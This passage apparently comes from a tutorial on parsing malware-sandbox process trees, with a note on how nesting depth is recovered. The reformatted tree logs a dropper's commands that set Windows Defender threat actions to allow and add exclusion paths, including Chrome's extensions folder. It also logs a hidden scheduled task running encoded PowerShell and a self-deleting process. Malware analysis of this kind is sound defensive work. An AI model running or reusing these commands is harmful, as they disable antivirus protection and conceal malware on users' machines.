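C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:4872
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"3⤵PID:5320
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 34⤵PID:1760
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 5042⤵
- Program crash
PID:592
-
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4560 -
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵PID:5360
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1572
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:5360
"""
```

When both readings of the trailing digits are valid (`-ForceV112⤵` directly under a depth-11 parent), the parser keeps the deeper one, which is correct for every line on this page; a command line that ends in a digit and sits directly under a deep parent could still be misread, so treat the recovered depth as a heuristic and use `ordinal`, not `pid`, as the key when joining these nodes to other artifacts.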
C:\Users\Admin\AppData\Local\Temp\7zS1C7C.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS1C7C.tmp\Install.exe it /NhedidIXUK 385118 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
PID:5780 -
(level 2) C:\Windows\SysWOW64\cmd.exe  PID 5640
    cmd (wrapped at '&'): "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" &
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" &
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" &
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" &
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  (level 3) C:\Windows\SysWOW64\forfiles.exe  PID 5644
      cmd: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    (level 4) C:\Windows\SysWOW64\cmd.exe  PID 5636
        cmd: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      (level 5) \??\c:\windows\SysWOW64\reg.exe  PID 5732
          cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
  (level 3) C:\Windows\SysWOW64\forfiles.exe  PID 5580
      cmd: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    (level 4) C:\Windows\SysWOW64\cmd.exe  PID 5568
        cmd: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      (level 5) \??\c:\windows\SysWOW64\reg.exe  PID 588
          cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
  (level 3) C:\Windows\SysWOW64\forfiles.exe  PID 5300
      cmd: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    (level 4) C:\Windows\SysWOW64\cmd.exe  PID 5256
        cmd: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      (level 5) \??\c:\windows\SysWOW64\reg.exe  PID 5264
          cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
  (level 3) C:\Windows\SysWOW64\forfiles.exe  PID 2884
      cmd: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    (level 4) C:\Windows\SysWOW64\cmd.exe  PID 2840
        cmd: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      (level 5) \??\c:\windows\SysWOW64\reg.exe  PID 4488
          cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
  (level 3) C:\Windows\SysWOW64\forfiles.exe  PID 5892
      cmd: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    (level 4) C:\Windows\SysWOW64\cmd.exe  PID 5960
        cmd: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      (level 5) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  PID 1268
          cmd: powershell start-process -WindowStyle Hidden gpupdate.exe /force
          - Command and Scripting Interpreter: PowerShell
          - Drops file in System32 directory
        (level 6) C:\Windows\SysWOW64\gpupdate.exe  PID 3404
            cmd: "C:\Windows\system32\gpupdate.exe" /force
(level 2) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  PID 4192
    cmd (wrapped at ';'): powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
  (level 3) C:\Windows\SysWOW64\cmd.exe  PID 5152
      cmd: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    (level 4) C:\Windows\SysWOW64\reg.exe  PID 3624
        cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 6100
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 6088
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5508
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 4248
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5512
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5688
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5704
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5700
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 4616
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 924
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5736
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5740
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5764
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5132
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5732
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5648
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5552
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5560
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5572
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5264
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5292
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 4628
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 4488
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5800
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5940
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5964
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5984
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
(level 2) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  PID 5880
    cmd (wrapped at ';'): powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
    - Drops file in System32 directory
  (level 3) C:\Windows\SysWOW64\cmd.exe  PID 2328
      cmd: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    (level 4) C:\Windows\SysWOW64\reg.exe  PID 1252
        cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5668
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5596
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5640
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5796
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 6116
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5340
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 2196
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 3856
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 2728
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5400
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5472
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5324
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 4652
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 5308
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 1512
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 4816
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
  (level 3) C:\Windows\SysWOW64\reg.exe  PID 4432
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
(level 2) C:\Windows\SysWOW64\schtasks.exe  PID 4804
    cmd: schtasks /CREATE /TN "gxTcKWwzR" /SC once /ST 01:00:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)
(level 2) C:\Windows\SysWOW64\schtasks.exe  PID 5072
    cmd: schtasks /run /I /tn "gxTcKWwzR"
(level 2) C:\Windows\SysWOW64\schtasks.exe  PID 5936
    cmd: schtasks /DELETE /F /TN "gxTcKWwzR"
(level 2) C:\Windows\SysWOW64\schtasks.exe  PID 5324
